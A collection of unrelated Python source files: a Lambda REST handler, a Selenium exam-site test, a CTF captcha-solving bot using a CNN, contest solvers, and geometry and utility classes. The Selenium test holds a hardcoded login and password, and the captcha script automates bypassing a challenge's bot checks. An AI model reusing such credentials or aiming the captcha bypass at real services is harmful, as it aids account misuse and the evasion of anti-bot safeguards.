    fuseki_client.setQuery(query)
    fuseki_client.queryType = "INSERT"
    fuseki_client.method = "POST"
    fuseki_client.query()
    return True
def tests():
    """Manual smoke tests.

    Uncomment individual calls to run them against the live Fuseki
    endpoints -- note that most of them mutate real data.
    """
    pass
    # print(get_db_labels().keys())
    # print(get_preferences())
    # print(delete_preference("Cassandra"))
    # print(delete_preference("Neo4j"))
    # print(delete_preference("Redis"))
    # print(delete_preference("MongoDB"))
    # print(delete_preference("HBase"))
    # print(get_preference('Redis'))
    # print(insert_preference('HBase', 12))
    # print(add_user_preference('ZeroDB', 'bd576b0f-7f91-40d3-93ce-9ec202d38a3c'))
    # print(remove_user_preference('Oracle', '38325f1f-3176-40b0-a3bf-2b653c9f3c8d'))
    # print(update_preference('Redis', 25))
def lambda_handler(event, context):
    """AWS Lambda entry point: REST-style dispatch on ``httpMethod``.

    GET    -> all preferences, or a single one when ``?label=`` is given
    POST   -> attach a user to a preference
    PUT    -> overwrite a preference's views_count
    DELETE -> remove a preference
    Anything else -> 400 with a plain-text body.
    """
    http_method = event.get('httpMethod')
    # get preferences or preference
    if http_method == 'GET':
        # Fixed: API Gateway sends queryStringParameters as None (not {})
        # when the request has no query string, which raised AttributeError.
        params = event.get('queryStringParameters') or {}
        label = params.get('label', None)
        if label is None:
            response = get_preferences()
        else:
            response = get_preference(label)
        return {
            "statusCode": 200,
            "headers": {"Access-Control-Allow-Origin": "*"},
            "body": json.dumps(response)
        }
    # add user preference
    if http_method == 'POST':
        body = json.loads(event.get('body'))
        response = add_user_preference(body['label'], body['user_id'])
        return {
            "statusCode": 200,
            "headers": {"Access-Control-Allow-Origin": "*"},
            "body": json.dumps(response)
        }
    # update views count
    if http_method == 'PUT':
        new_data = json.loads(event.get('body'))
        response = update_preference(new_data['label'], new_data['views_count'])
        return {
            "statusCode": 200,
            "headers": {"Access-Control-Allow-Origin": "*"},
            "body": json.dumps(response)
        }
    # delete preference
    if http_method == 'DELETE':
        new_data = json.loads(event.get('body'))
        response = delete_preference(new_data['label'])
        return {
            "statusCode": 200,
            "headers": {"Access-Control-Allow-Origin": "*"},
            # Fixed: the body must be a JSON string, not a raw bool, to
            # match the other branches and API Gateway's response contract.
            "body": json.dumps(response)
        }
    return {
        "statusCode": 400,
        "headers": {"Access-Control-Allow-Origin": "*"},
        "body": "No matched method"
    }
|
from selenium import webdriver
import unittest
import time
from selenium.webdriver.common.keys import Keys
class TestCaseTaoKipThi(unittest.TestCase):
    """Selenium UI flow: log in to a.khaothi.online and create an exam shift.

    The test methods are order-dependent (test_1 .. test_4 share one
    browser session created in setUpClass).
    """

    @classmethod
    def setUpClass(cls):
        # One shared Chrome session for the whole ordered test sequence.
        cls.driver = webdriver.Chrome(executable_path="D:\pythonProject\driver\chromedriver.exe")
        cls.driver.implicitly_wait(10)
        cls.driver.maximize_window()

    def test_1_OpenWeb(self):
        """Open the login page."""
        driver = self.driver
        driver.get("https://a.khaothi.online/login")  # open the web page
        driver.set_page_load_timeout(20)
        time.sleep(0.3)

    def test_2_Login(self):
        """Sign in with the test account and switch to the school edition."""
        driver = self.driver
        driver.find_element_by_xpath("//*[@id='basic_email']").click()
        driver.find_element_by_xpath("//*[@id='basic_email']").send_keys("fis@xcbt.online")
        driver.find_element_by_xpath("//*[@id='basic_password']").click()
        driver.find_element_by_xpath("//*[@id='basic_password']").send_keys("Abc@123")
        driver.find_element_by_xpath("//*[@id='basic']/div[3]/div/div/div/button").click()
        time.sleep(0.5)
        # Click "Phiên bản trường" (school edition).
        driver.find_element_by_xpath("//span[contains(.,'Phiên bản trường')]").click()

    def test_3_Danhsachkipthi(self):
        """Navigate to the exam-shift list ("Danh sách kíp thi") and print its heading."""
        driver = self.driver
        time.sleep(0.5)
        driver.find_element_by_xpath("//li[6]/div").click()
        # FIXME (translated): needs fixing because the menu always jumps.
        driver.find_element_by_xpath("//a[contains(text(),'Danh sách kíp thi')]").click()
        a = driver.find_element_by_xpath("//*[@id='root']/section/section/main/div[2]/div/div/div/div/h3").text
        print(a)

    def test_4_TaoKipThi(self):
        """Fill in and submit the 'create exam shift' form."""
        driver = self.driver
        driver.find_element_by_xpath("//*[@id='root']/section/section/main/div[2]/div/div/div/div/h3/a").click()
        driver.find_element_by_xpath("//*[@id='text-input']").click()
        driver.find_element_by_xpath("//*[@id='text-input']").send_keys("python auto test")
        # Select the question-package dropdown and pick the auto-test package.
        driver.find_element_by_xpath("//div[@id='react-select-2--value']/div").click()
        time.sleep(0.3)
        driver.find_element_by_xpath("//div[@id='react-select-2--value']/div/input").send_keys("FFDQHU - Gói đề test -Auto - vui lòng không sử dụng")
        driver.find_element_by_xpath("//div[@id='react-select-2--value']/div/input").send_keys(Keys.ENTER)
        # Select the class dropdown and pick the auto-test class.
        driver.find_element_by_xpath("//div[@id='react-select-3--value']/div").click()
        time.sleep(0.3)
        driver.find_element_by_xpath("//div[@id='react-select-3--value']/div/input").send_keys("Lớp test _auto_Vui long không sử dụng")
        driver.find_element_by_xpath("//div[@id='react-select-3--value']/div/input").send_keys(Keys.ENTER)
        driver.find_element_by_xpath("//*[@id='root']/section/section/main/div[2]/div/div/div/div/form/div[8]/div[2]").click()
        time.sleep(0.5)
        driver.find_element_by_xpath("//div[@id='root']/section/section/main/div[2]/div/div/div/div/form/div[8]/div[2]/textarea").send_keys("testok")
        # (translated) The exam shift's active-time fields need no editing
        # because they are auto-filled.
        driver.find_element_by_name("time_limit").click()
        driver.find_element_by_name("time_limit").clear()
        driver.find_element_by_name("time_limit").send_keys("60")
        driver.execute_script("window.scrollTo(0,document.body.scrollHeight)")
        driver.find_element_by_xpath("/html/body/div[2]/section/section/main/div[2]/div/div/div/div/form/div[19]/div/button").click()

    @classmethod
    def tearDownClass(cls):
        # Browser intentionally left open for inspection.
        # cls.driver.close()
        # cls.driver.quit()
        print("Complete")
import requests
from lxml import etree
from io import StringIO
import base64
import codecs
from keras.models import load_model
from helpers import resize_to_fit
from imutils import paths
import numpy as np
import imutils
import cv2
import pickle
import os
import glob
import time
try:
import Image
except ImportError:
from PIL import Image
from subprocess import check_output
import Solver
# Trained Keras CNN that classifies individual captcha letters, plus the
# pickled label encoder that maps model outputs back to characters.
LETTER_MODEL_FILENAME = "captcha_model.hdf5"
LETTER_MODEL_LABELS_FILENAME = "model_labels.dat"
# folder to temporarily save captcha images between request and solve
TEMP_CAPTCHA = "TEMP"
URL = "http://hax1.allesctf.net:9200/captcha/"
# init the lxml HTML parser (reused for every response)
parser = etree.HTMLParser()
# load labels for the model
with open(LETTER_MODEL_LABELS_FILENAME, "rb") as f:
    LETTER_MODEL_LABELS = pickle.load(f)
# load the model (done once at import time -- it is expensive)
LETTER_MODEL = load_model(LETTER_MODEL_FILENAME)
# function to clear all temporaliy stored captchas
def clearFiles():
    """Delete every temporary captcha image from the TEMP folder."""
    for path in glob.glob(TEMP_CAPTCHA + "/*"):
        os.remove(path)
# parse the html, decode base-64 images and then save them
def extractCaptchas(html):
    """Parse the challenge page and save each base64 captcha image to TEMP.

    Returns False when the expected DOM path is missing (e.g. a failure
    page), True otherwise.
    """
    # turn into tree using the html parser as specified above
    tree = etree.parse(StringIO(html), parser=parser)
    root = tree.getroot()
    try:
        # Part of the DOM hierarchy that contains the captchas -- brittle
        # positional indexing tied to the exact page layout.
        captchas = root[1][1][1][1][1]
    except IndexError:
        return False
    # Every captcha has a button below it, so only every second element is
    # an image.
    print("found " + str((len(captchas) - 1) // 2) + " captchas")
    for i in range(0, len(captchas) - 1, 2):
        # Strip the 22-char "data:image/png;base64," prefix from the src.
        img = captchas[i][0].attrib['src'][22:]
        # file names: 0-<num captchas>
        fileName = TEMP_CAPTCHA + "/{}.png".format(i//2)
        fh = open(fileName, "wb")
        imgData = img.encode('ASCII')
        fh.write(codecs.decode(imgData, encoding='base64'))
        fh.close()
    return True
# send the asnwers for a spezific stage with a session and store new captchas
def sendAnswers(session, stage, answers):
    """POST the captcha answers for ``stage`` and stash the next captchas.

    On completing the final stage (3) the response -- which contains the
    flag -- is written to flag.html and the process exits.  Otherwise
    returns the result of extractCaptchas on the response (False when the
    server redirected to a fail page).
    """
    print("seding answers")
    for key in answers:
        print(key + " : " + answers[key])
    # send as a post request with our answers
    response = session.post(URL+ str(stage), data=answers)
    # if we completed the last stage (3), save the flag and exit
    if not("fail" in response.url) and stage == 3:
        f = open("flag.html", "w")
        f.write(response.content.decode("utf-8"))
        f.close()
        print("flag found!!!")
        os._exit(0)
    # extract the images for the next stage from the response
    return extractCaptchas(response.content.decode("utf-8"))
# use Solver.py to get the answers for every image in the temp folder and return a dict for a post requests
def getAllAnswers():
    """Solve every captcha image currently in the TEMP folder.

    Returns a dict mapping the image's base file name (without extension)
    to the solved text, suitable as POST form data.
    """
    # dict to hold all answers
    answers = {}
    # iterate over every image file in the temp folder
    for image_file in list(paths.list_images(TEMP_CAPTCHA)):
        filename = os.path.basename(image_file)
        # get the answer as a string from the cv2 image via Solver
        image = cv2.imread(image_file)
        answer = Solver.solve(image)
        # key the answer by the file name minus the ".png" suffix
        answers[filename[:-4]] = answer
    return answers
# loop and solve captchas untill we got the flag
def main():
    """Loop forever solving captcha stages 0-3 until the flag is found.

    Any failed stage restarts the whole run; sendAnswers exits the process
    when stage 3 succeeds.
    """
    # create the temp folder if it doesn't exist
    if not os.path.exists(TEMP_CAPTCHA):
        os.makedirs(TEMP_CAPTCHA)
    # one requests session so all stages share the same session cookie
    requstSession = requests.Session()
    requstSession.headers['User-Agent'] = 'Mozilla/5'
    while True:
        time.sleep(0.5)
        # empty the temp folder from the previous attempt
        clearFiles()
        # get the first set of captchas for the start
        response = requstSession.get(URL + "0")
        extractCaptchas(response.content.decode("utf-8"))
        # complete baby stage
        asnwersS0 = getAllAnswers()
        if(not sendAnswers(requstSession, 0, asnwersS0)): continue
        # complete human stage
        asnwersS1 = getAllAnswers()
        if(not sendAnswers(requstSession, 1, asnwersS1)): continue
        # complete tool-assisted stage
        asnwersS2 = getAllAnswers()
        if(not sendAnswers(requstSession, 2, asnwersS2)): continue
        # complete bot stage and get the flag (sendAnswers exits on success)
        asnwersS3 = getAllAnswers()
        sendAnswers(requstSession, 3, asnwersS3)

if __name__ == "__main__":
    main()
|
# Greedy stdin script: read a starting value and a count, then process
# "monster" strengths in ascending order.  NOTE(review): semantics inferred
# from the code alone -- appears to be a contest problem about maximising
# the number of points banked from defeated monsters.
input_str = input()
i_and_moster = input_str.split(" ")
i_val = int(i_and_moster[0])   # starting strength
moster_num = i_and_moster[-1]  # declared monster count (never used below)
#print(i_val, moster_num)
input_str = input()
moster_list = input_str.split(" ")
#print(moster_list)
moster_list = [int(i) for i in moster_list]
moster_list.sort()  # fight the weakest monsters first
#print(moster_list)
money = 0       # points currently banked from defeated monsters
high_money = 0  # best banked total seen so far (printed as the answer)
for moster_val in range(len(moster_list)):
    if i_val >= moster_list[moster_val]:
        # Strong enough outright: defeat it and bank one point.
        money += 1
        if money > high_money:
            high_money = money
    else:
        if i_val + money >= moster_list[moster_val]:
            # Spend banked points to raise strength to the monster's level,
            # then defeat it.
            money -= moster_list[moster_val] - i_val
            i_val = moster_list[moster_val]
            money += 1
            if money > high_money:
                high_money = money
        else:
            # Unaffordable even with every banked point; the list is sorted,
            # so all remaining monsters are at least as strong.
            break
print(high_money)
import sys
import datetime
import glob
from matplotlib import pyplot as plt
import matplotlib.dates as md
from git import Repo
def count_lines(extensions):
    """Count non-blank lines per extension under the global ``path_to_repo``.

    Returns a list of (extension, line_count) tuples in the same order as
    ``extensions``.  Fixed: the bare ``except: pass`` swallowed *every*
    exception (including KeyboardInterrupt/SystemExit); the best-effort
    behaviour is kept but limited to expected read failures, and undecodable
    bytes no longer abort a file mid-count.
    """
    results = []
    for ext in extensions:
        count = 0
        files = glob.glob(path_to_repo + '/**/*' + ext, recursive=True)
        for filename in files:
            try:
                # errors='replace' keeps counting through bytes that are not
                # valid in the default encoding.
                with open(filename, errors='replace') as f:
                    for line in f:
                        if not line.isspace():
                            count += 1
            except OSError:
                # Unreadable file (permissions, broken symlink, ...): skip.
                pass
        results.append((ext, count))
    return results
def plot_results(dates, results):
    """Plot one line-count series per extension over time.

    :param dates: list of Unix timestamps (ints)
    :param results: list of per-extension count lists, parallel to ``dates``
    Saves the figure to results.jpg and also shows it interactively.
    """
    f, ax = plt.subplots(1, sharex='all', sharey='all')
    xfmt = md.DateFormatter('%Y-%m-%d')
    formatted_dates = [datetime.datetime.fromtimestamp(date) for date in dates]
    for result in results:
        ax.plot(formatted_dates, result)
    ax.xaxis.set_major_formatter(xfmt)
    # Rotate date labels so they do not overlap.
    f.autofmt_xdate()
    plt.savefig("results.jpg")
    plt.show()
def save_results(dates, results):
    """Write timestamps and per-extension counts to results.txt as CSV rows.

    First row: comma-joined dates; each following row: one extension's counts.
    """
    rows = [','.join(str(date) for date in dates)]
    for series in results:
        rows.append(','.join(str(count) for count in series))
    with open('results.txt', 'w') as f:
        f.write('\n'.join(rows) + '\n')
#Path to repository should be the argument to script
print("Args: " + str(sys.argv))
# argv[1] = mode ("full" or "increment"), argv[2] = repo path,
# argv[3] = comma-separated list of file extensions to count.
type = sys.argv[1]  # NOTE(review): shadows the builtin ``type``
path_to_repo = sys.argv[2]
print('Repo: ' + path_to_repo)
extensions = [x.strip() for x in sys.argv[3].split(',')]
print('Extensions: ' + str(extensions))
repo = Repo(path_to_repo)
git = repo.git
git.checkout('master')
git.pull()
commits = list(repo.iter_commits())  # newest first
if type == 'full':
    # Full rebuild: walk history newest-to-oldest, sampling commits at
    # exponentially growing time intervals (1 day doubling up to 30 days).
    max_interval_seconds = 3600 * 24 * 30
    interval_seconds = 3600 * 24
    date = None
    filtered_commits = []
    print("Filtered commit dates:")
    results = [[] for ext in extensions]
    dates = []
    for commit in commits:
        # Always include the oldest commit (commits[-1]) so the series
        # starts at the beginning of history.
        if date == None or commit.committed_date < (date - interval_seconds) or commits[-1] == commit:
            date = commit.committed_date
            #Increase interval between commits
            interval_seconds = min(max_interval_seconds, interval_seconds * 2)
            filtered_commits.append(commit)
            # Check out the sampled commit and count its lines.
            git.checkout(commit.hexsha, force=True)
            dates.append(date)
            result = count_lines(extensions)
            for i in range(len(result)):
                results[i].append(result[i][1])
            print(datetime.datetime.fromtimestamp(date).strftime('%Y-%m-%d %H:%M') + ': ' + str(result))
    save_results(dates, results)
    plot_results(dates, results)
elif type == 'increment':
    # Incremental mode: prepend the current HEAD's counts to saved results.
    with open('results.txt', 'r') as f:
        lines = list(f)
    dates = [int(s) for s in lines[0].split(',')]
    results = [[int(s) for s in l.split(',')] for l in lines[1:]]
    dates.insert(0,commits[0].committed_date)
    current_count = count_lines(extensions)
    for i in range(len(results)):
        results[i].insert(0,current_count[i][1])
    save_results(dates, results)
    plot_results(dates, results)
else:
    print("Unknown command: " + type + " Allowed commands: full, increment")
import sys
import collections
def all_reversals(permutation):
    """Yield every (reversed_permutation, (start, end)) pair.

    Endpoints are reported 1-based and inclusive; only segments of length
    at least 2 are reversed.
    """
    n = len(permutation)
    for start in range(n):
        for end in range(start + 2, n + 1):
            flipped = permutation[:start] + permutation[start:end][::-1] + permutation[end:]
            yield flipped, (start + 1, end)
def determine_reversals(p_init, p_target):
    """ Sorting by reversals via meet-in-the-middle bidirectional BFS.

    :param p_init: the initial permutation (sequence supporting + and slicing)
    :param p_target: the target permutation
    :return: the reversal distance (int) and the reversal endpoint indices
        (list of 2-tuples).  NOTE(review): for equal inputs this returns
        ``(0, ("", ""))`` -- a 2-tuple of strings, not a list; quirk
        preserved.
    """
    # if the permutations are equal, the reversal distance is 0 with no reversals
    if p_init == p_target:
        return 0, ("", "")
    # Forward BFS from p_init; nodes at distance 4 record their children but
    # stop enqueueing, so states up to distance 5 are known.
    q = collections.deque((p_init, ))
    dist_init = {p_init: 0}
    rev_hist_init = {p_init: []}
    while q:
        perm = q.popleft()
        dist = dist_init[perm]
        rev_hist = rev_hist_init[perm]
        for (perm_new, rev) in all_reversals(perm):
            if perm_new == p_target:
                # Early exit: target reachable within the forward radius.
                return dist + 1, rev_hist + [rev]
            if perm_new not in dist_init:
                dist_init[perm_new] = dist + 1
                rev_hist_init[perm_new] = rev_hist + [rev]
                if dist != 4:
                    q.append(perm_new)
    # Backward BFS from p_target with a smaller radius; a state seen by both
    # searches yields a candidate total distance.
    q = collections.deque((p_target,))
    dist_target = {p_target: 0}
    rev_hist_target = {p_target: []}
    final_dist = 1e6  # sentinel "infinity"
    while q:
        perm = q.popleft()
        dist = dist_target[perm]
        rev_hist = rev_hist_target[perm]
        for (perm_new, rev) in all_reversals(perm):
            if perm_new not in dist_target:
                dist_target[perm_new] = dist + 1
                rev_hist_target[perm_new] = rev_hist + [rev]
                if dist != 3:
                    q.append(perm_new)
            if perm_new in dist_init:
                # Meeting point: total distance is the sum of both halves.
                if final_dist > dist_init[perm_new] + dist_target[perm_new]:
                    final_dist = dist_init[perm_new] + dist_target[perm_new]
                    # The backward half must be replayed in reverse order.
                    final_rev_hist = rev_hist_init[perm_new] + rev_hist_target[perm_new][::-1]
    # NOTE(review): if the searches never meet, final_rev_hist is unbound
    # and this raises UnboundLocalError -- assumed unreachable for the
    # length-10 inputs this problem guarantees.
    return final_dist, final_rev_hist
if __name__ == "__main__":
    '''
    Given: Two permutations π and γ, each of length 10.
    Return: The reversal distance drev(π,γ), followed by a collection of reversals sorting π into γ. If multiple collections of such reversals exist, you may return any one.
    '''
    # Each permutation is kept as a tuple of number *strings*; tuples support
    # the slicing and concatenation that all_reversals relies on.
    input_lines = sys.stdin.read().splitlines()
    perm1 = tuple([x for x in input_lines[0].split()])
    perm2 = tuple([x for x in input_lines[1].split()])
    (rev_distance, revs_list) = determine_reversals(perm1, perm2)
    print(rev_distance)
    # Print each reversal's 1-based endpoints on its own line.
    for (x1, x2) in revs_list:
        print(x1, x2)
|
import abc

class GameEngine(abc.ABC):
    """Abstract interface that every game engine implementation must satisfy.

    Modernised: inherits from ``abc.ABC`` instead of the equivalent but
    more verbose ``(object, metaclass=abc.ABCMeta)`` form; behaviour for
    subclasses is unchanged.
    """

    @abc.abstractmethod
    def create_new_game(self):
        """
        :return: an initial GameState object, representing the initial state of a game
        """
        raise NotImplementedError()
|
# -*- coding: utf-8 -*-
import json
class AlbBaseException(Exception):
    """Base exception that serialises to a JSON envelope of code/message/data."""

    # Default HTTP status reported alongside this exception.
    http_status_code = 200

    def __init__(self, code, message=None, data=None):
        self.code = code
        self.message = message
        self.data = data
        # Alias kept for callers that invoke .tojson() instead of str().
        self.tojson = self.__str__

    def __str__(self):
        payload = {
            'code': self.code,
            'message': self.message,
            'data': self.data,
        }
        return json.dumps(payload)
class BadRequestException(AlbBaseException):
    """HTTP 400 Bad Request."""

    http_status_code = 400

    def __init__(self, code=400, message=None, data=None):
        super().__init__(code, message, data)
class UnauthorizedException(AlbBaseException):
    """HTTP 401 Unauthorized."""

    http_status_code = 401

    def __init__(self, code=401, message=None, data=None):
        super().__init__(code, message, data)
class ForbiddenException(AlbBaseException):
    """HTTP 403 Forbidden."""

    http_status_code = 403

    def __init__(self, code=403, message=None, data=None):
        super().__init__(code, message, data)
class NotFoundException(AlbBaseException):
    """HTTP 404 Not Found."""

    http_status_code = 404

    def __init__(self, code=404, message=None, data=None):
        super().__init__(code, message, data)
if __name__ == '__main__':
    # Smoke test: exercise JSON serialisation of the base class and a subclass.
    print(AlbBaseException(200, "", ""))
    print(NotFoundException())
|
import numpy as np
from geoalt_geometry.vertices import Vertex, VertexCollection
from geoalt_geometry.edges import Edge, EdgeCollection
from timeit import default_timer as timer
class FaceCollection:
    '''
    Collection of Face objects parsed from an STL file.

    Splits faces into "good" and "problem" (bad overhang angle) sets and
    owns shared vertex/edge collections so each unique vertex and edge
    exists exactly once across all faces.
    '''
    def __init__(self, stlfile):
        self.stlfile = stlfile
        self.faces = []          # all faces, in insertion order
        self.problem_faces = []  # faces flagged with a bad angle
        self.good_faces = []     # remaining faces
        self.vertex_collection = VertexCollection()  # deduplicated vertices
        self.edge_collection = EdgeCollection()      # deduplicated edges
        self.iterator_pointer = 0  # cursor for the iterator protocol below
        self.total_weight = 0

    def append(self, face, ignore_edges=False):
        '''
        Add face to face collection.

        :param face: Face instance to add (TypeError otherwise)
        :param ignore_edges: skip edge registration when True
        '''
        if (isinstance(face, Face) is False):
            raise TypeError('face argument needs to be of type Face()')
        # Bucket by the angle check performed when the face was built.
        if face.has_bad_angle is True:
            self.problem_faces.append(face)
        else:
            self.good_faces.append(face)
        # This is where it is ensured using OOP that there only exists one instance of each unique vertex
        face.vertices[0] = self.vertex_collection.add(face.vertices[0])
        face.vertices[1] = self.vertex_collection.add(face.vertices[1])
        face.vertices[2] = self.vertex_collection.add(face.vertices[2])
        # Each unique vertex is marked as adjacent to the other vertices in the face.
        face.vertices[0].set_adjacency(face.vertices[1])
        face.vertices[0].set_adjacency(face.vertices[2])
        face.vertices[1].set_adjacency(face.vertices[2])
        self.faces.append(face)
        if ignore_edges is not True:
            face.set_edges(self.edge_collection)
        return

    def __iter__(self):
        '''
        Contributes to making this class iterable by providing an interface.

        NOTE(review): returns self with a single shared pointer, so nested
        or concurrent iterations over the same collection interfere.
        '''
        return self

    def __next__(self):
        '''
        Contributes to making this class iterable by providing a pointer.
        The pointer resets to 0 when iteration is exhausted.
        '''
        if self.iterator_pointer > (len(self.faces) - 1):
            self.iterator_pointer = 0
            raise StopIteration
        else:
            self.iterator_pointer += 1
            return self.faces[self.iterator_pointer - 1]

    def get_warning_count(self):
        '''
        Returns the amount of potentially problematic faces.
        '''
        return len(self.problem_faces)

    def get_vertices(self, vtype="all"):
        '''
        Return per-face vertex arrays for "all", "bad" or "good" faces.
        Unknown vtype values yield an empty list.
        '''
        return_array = []
        if vtype=="all":
            for f in self.faces:
                return_array.append(f.get_vertices_as_arrays())
        elif vtype=="bad":
            for f in self.problem_faces:
                return_array.append(f.get_vertices_as_arrays())
        elif vtype=="good":
            for f in self.good_faces:
                return_array.append(f.get_vertices_as_arrays())
        return return_array

    def get_vertex_collection(self):
        # Accessor for the shared deduplicated vertex collection.
        return self.vertex_collection

    def check_for_problems(self, phi_min=np.pi/4, ignore_grounded=False, ground_level=0, ground_tolerance=0.01, angle_tolerance=0.017):
        '''
        Re-classify every face into good/problem using the given thresholds.

        Resets total_weight and both buckets, refreshes each face's normal
        vector, then re-runs the per-face angle check.
        '''
        self.total_weight = 0
        self.good_faces = []
        self.problem_faces = []
        for f in self.faces:
            f.refresh_normal_vector()
            has_bad_angle = f.check_for_problems(phi_min=phi_min, ignore_grounded=ignore_grounded, ground_level=ground_level, ground_tolerance=ground_tolerance, angle_tolerance=angle_tolerance, no_weight_update=False)
            if has_bad_angle is True:
                self.problem_faces.append(f)
            else:
                self.good_faces.append(f)
class Face:
    '''
    STL polygon face (a single triangle).

    Holds three Vertex objects, the (re)computed normal vector, overhang-angle
    state and a printability "weight" contribution. Instances are registered
    with a FaceCollection, which is used for weight bookkeeping.
    '''
    def __init__(self, face_collection, normal_index, vertex_index):
        '''
        face_collection: owning FaceCollection (used for weight/ground bookkeeping)\n
        normal_index, vertex_index: indices of this face's normal/vertex data in the source STL arrays\n
        '''
        self.face_collection = face_collection
        # BUGFIX: these previously discarded the constructor arguments and were
        # always initialized to None; store what the caller passed in.
        self.normal_index = normal_index
        self.vertex_index = vertex_index
        self.vertices = []
        self.weight = 0
        self.edge1 = None
        self.edge2 = None
        self.edge3 = None
        self.n = None                 # The normal vector
        self.n_hat = None             # Normalized normal vector (unit vector)
        self.n_hat_original = None    # The original normalized normal vector from when the model was loaded the first time
        self.has_bad_angle = None     # True if this face has a problematic angle
        self.angle = None             # The angle compared to the xy-plane
        self.grounded = False         # True when the face rests on the build plate
        self.vector1 = None           # Edge vector v0->v1 (set by refresh_normal_vector)
        self.vector2 = None           # Edge vector v0->v2 (set by refresh_normal_vector)
    def set_edges(self, edge_collection):
        '''Register this face's three edges with the shared EdgeCollection and back-link them.'''
        # SLOW:
        self.edge1 = edge_collection.add(Edge(self.vertices[0], self.vertices[1]))
        self.edge2 = edge_collection.add(Edge(self.vertices[1], self.vertices[2]))
        self.edge3 = edge_collection.add(Edge(self.vertices[2], self.vertices[0]))
        # FAST:
        self.edge1.associate_with_face(self)
        self.edge2.associate_with_face(self)
        self.edge3.associate_with_face(self)
    def __connect_vertices__(self):
        '''
        Connect all vertices to each other
        '''
        self.vertices[0].set_adjacency(self.vertices[1])
        self.vertices[0].set_adjacency(self.vertices[2])
        self.vertices[1].set_adjacency(self.vertices[2])
    def get_top_z(self):
        '''Return the largest Z coordinate among this face's three vertices.'''
        z_array = np.array(self.get_vertices_as_arrays())[:, 2]
        return z_array[np.argsort(z_array)[2]]
    def refresh_normal_vector(self):
        '''Recompute the (unit) normal from the current vertex positions and return it.'''
        self.vector1 = self.vertices[1].get_array() - self.vertices[0].get_array()
        self.vector2 = self.vertices[2].get_array() - self.vertices[0].get_array()
        self.n = np.cross(self.vector1, self.vector2)
        self.n_hat = self.n/np.linalg.norm(self.n)
        return self.n_hat
    def check_for_problems(self, phi_min=np.pi/4, ignore_grounded=False, ground_level=0, ground_tolerance=0.01, angle_tolerance=0.017, no_weight_update=True):
        '''
        phi_min: Min angle before problem, in rads.\n
        ignore_grounded: Ignore surfaces close to the floor (prone to visual bugs in python)\n
        ground_level: The z-index of the ground\n
        ground_tolerance: How close a vertex needs to be to the ground in order to be considered as touching it.\n
        angle_tolerance: How close to the phi_min an angle needs to be in order to be considered as acceptable.
        Setting this to 0 causes the problem correction process to take much more time.\n
        Returns True when the face has a problematic overhang angle.
        Requires refresh_normal_vector() to have been called so n_hat is set.
        '''
        # Check the angle of the normal vector against the inverted z-unit vector.
        neg_z_hat = [0, 0, -1]
        angle = np.arccos(np.clip(np.dot(self.n_hat, neg_z_hat), -1.0, 1.0))
        self.angle = angle
        self.grounded = False
        return_value = None
        # Check if angle is within problem threshold
        if angle >= 0 and angle < phi_min:
            self.grounded = self.check_grounded(ground_level, ground_tolerance)
            if self.grounded is True and ignore_grounded is False: # Check if grounded
                self.has_bad_angle = False
                return_value = False
            elif (angle - phi_min)**2 < angle_tolerance**2: # Check if inside tolerance
                self.has_bad_angle = False
                return_value = False
            else:
                # If the angle is bad, and it is not on the ground, and is outside of tolerances, then mark it as a bad angle.
                self.has_bad_angle = True
                return_value = True
        else:
            # The angle is outside of the problem threshold and should thus be marked as an accepted angle.
            self.has_bad_angle = False
            return_value = False
        # Calculate weight
        self.calculate_weight(phi_min=phi_min, no_update=no_weight_update)
        return return_value
    def calculate_weight(self, phi_min=np.pi/4, no_update=True):
        '''
        Compute this face's support-weight contribution from its XY-projected
        area and overhang angle. State (self.weight and the collection's
        total_weight) is only written back when no_update is False.
        '''
        # Calculate area of projection onto XY plane
        cross = np.cross([self.vector1[0], self.vector1[1], 0], [self.vector2[0], self.vector2[1], 0])
        area = np.linalg.norm(cross)/2
        # Linear weight-per-area model constants (heavy: steep overhang penalty, light: mild).
        m_heavy = 63.74
        k_heavy = 42.96
        m_light = 21.23
        k_light = 14.3
        weightPerArea = 0
        if self.angle < 0.087:
            # 5 degrees or less: Considered as flat overhang.
            if self.grounded is False:
                weightPerArea = 100
            else:
                weightPerArea = -80 # Discount for flat surfaces touching the ground. Easier to remove from substrate.
                self.face_collection.stlfile.grounded = True # Mark this orientation as grounded.
        elif self.angle < phi_min:
            # Use the named constants instead of repeating the literals.
            weightPerArea = m_heavy - self.angle * k_heavy # Linear proportion. 1 deg overhang = 60 weight per area, 30 deg overhang = 30 weight per area
        elif phi_min < self.angle and self.angle < (np.pi/2 - 0.087):
            weightPerArea = m_light - self.angle * k_light # Linear proportion. 45 deg overhang = 10 wpa, 89 deg overhang = 0 wpa
        weight = weightPerArea * area
        if no_update is False:
            self.weight = weight
            self.face_collection.total_weight += weight
        return weight
    def get_vertices_as_arrays(self):
        '''Return the three vertices as a (3, 3) numpy array of coordinates.'''
        return np.array([self.vertices[0].get_array(), self.vertices[1].get_array(), self.vertices[2].get_array()])
    def get_vertices(self):
        '''Return the three Vertex objects as a list.'''
        return [self.vertices[0], self.vertices[1], self.vertices[2]]
    def get_edges(self):
        '''Return the three Edge objects as a list.'''
        return [self.edge1, self.edge2, self.edge3]
    def __lt__(self, other):
        '''
        Sort faces descending by their highest vertex Z.
        BUGFIX: previously read the nonexistent attribute self.top_z, which
        raised AttributeError whenever faces were compared/sorted.
        '''
        return bool(self.get_top_z() > other.get_top_z())
    def check_grounded(self, ground_level, ground_tolerance):
        '''
        Check if this surface is parallel to the ground.
        '''
        # Calculate differences between individual vertex Z-elements, and the ground level.
        diff_1 = np.abs(self.vertices[0].get_array()[2] - ground_level)
        diff_2 = np.abs(self.vertices[1].get_array()[2] - ground_level)
        diff_3 = np.abs(self.vertices[2].get_array()[2] - ground_level)
        # If any of the ground levels is above the threshold, then return false, else return true.
        if diff_1 > ground_tolerance or diff_2 > ground_tolerance or diff_3 > ground_tolerance:
            return False
        return True
    def calculate_normal_vector(self):
        '''Compute and return a unit normal without caching it on the instance.'''
        n = np.cross((self.vertices[1].get_array() - self.vertices[0].get_array()), (self.vertices[2].get_array() - self.vertices[1].get_array()))
        return n/np.linalg.norm(n)
    def __eq__(self, other):
        '''Two faces are equal when they share all three vertices (order-independent).'''
        # NOTE(review): defining __eq__ without __hash__ makes Face unhashable in
        # Python 3 — confirm no caller stores faces in sets or as dict keys.
        if self.vertices[0] not in other.get_vertices():
            return False
        if self.vertices[1] not in other.get_vertices():
            return False
        if self.vertices[2] not in other.get_vertices():
            return False
        return True
import requests, json
from past.builtins import basestring
from copy import deepcopy
from datetime import date
"""
Edsby.py: An API wrapper/library for Python - v0.7.1
https://github.com/ctrezevant/PyEdsby/
